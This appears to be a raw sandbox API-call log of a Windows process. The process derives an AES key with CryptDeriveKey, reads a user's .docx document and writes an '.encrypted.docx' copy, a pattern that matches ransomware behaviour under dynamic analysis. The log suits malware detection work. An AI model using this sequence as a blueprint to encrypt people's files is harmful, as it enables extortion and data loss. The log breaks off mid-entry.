CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.791] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.791] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.791] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.791] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ulg-p8fths2s.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.792] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.792] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.792] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.792] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.792] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0035.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.794] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x")) returned 0x10 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ulg-p8fths2s.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.795] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.795] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0035.795] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.795] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.796] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.796] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x5920, lpOverlapped=0x0) returned 1 [0035.797] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5920) returned 0x955018 [0035.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5920) returned 0x95a940 [0035.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5920) returned 0x955018 [0035.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.800] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5920) returned 0x955018 [0035.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5920) returned 0x960268 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.803] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | 